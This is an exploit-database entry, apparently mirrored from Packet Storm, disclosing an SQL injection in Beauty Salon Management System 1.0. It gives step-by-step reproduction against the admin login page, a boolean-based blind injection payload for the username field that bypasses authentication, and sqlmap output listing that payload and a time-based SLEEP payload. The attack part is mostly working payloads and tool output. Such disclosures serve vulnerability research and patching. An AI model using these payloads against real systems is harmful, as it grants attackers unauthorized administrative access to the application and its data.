Exploit for Beauty Salon Management System 1.0 SQL Injection

Name: Exploit for Beauty Salon Management System 1.0 SQL Injection
Rating: 5 (45 reviews)
2023-07-05 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:173309
# Exploit Title: Beauty Salon Management System v1.0 - SQLi  
# Date of found: 04/07/2023  
# Exploit Author: Fatih Nacar  
# Version: V1.0  
# Tested on: Windows 10  
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>  
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/  
# CWE: CWE-89  
  
Vulnerability Description -  
  
Beauty Salon Management System: V1.0, developed by Campcodes, has been  
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability  
allows an attacker to manipulate login authentication with the SQL queries  
and bypass authentication. The system fails to properly validate  
user-supplied input in the username and password fields during the login  
process, enabling an attacker to inject malicious SQL code. By exploiting  
this vulnerability, an attacker can bypass authentication and gain  
unauthorized access to the system.  
  
Steps to Reproduce -  
  
The following steps outline the exploitation of the SQL Injection  
vulnerability in Beauty Salon Management System V1.0:  
  
1. Open the admin login page by accessing the URL:  
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php  
  
2. In the username and password fields, insert the following SQL Injection  
payload shown inside brackets to bypass authentication for usename  
parameter:  
  
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In}  
  
3.Execute the SQL Injection payload.  
  
As a result of successful exploitation, the attacker gains unauthorized  
access to the system and is logged in with administrative privileges.  
  
Sqlmap results:  
  
POST parameter 'username' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N] y  
  
sqlmap identified the following injection point(s) with a total of 793  
HTTP(s) requests:  
  
---  
  
Parameter: username (POST)  
  
Type: boolean-based blind  
  
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)  
  
Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In  
  
Type: time-based blind  
  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
  
Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--  
rvYF&password=test&login=Sign In  
  
---  
  
[15:58:56] [INFO] the back-end DBMS is MySQL  
  
web application technology: PHP 8.2.4, Apache 2.4.56  
  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)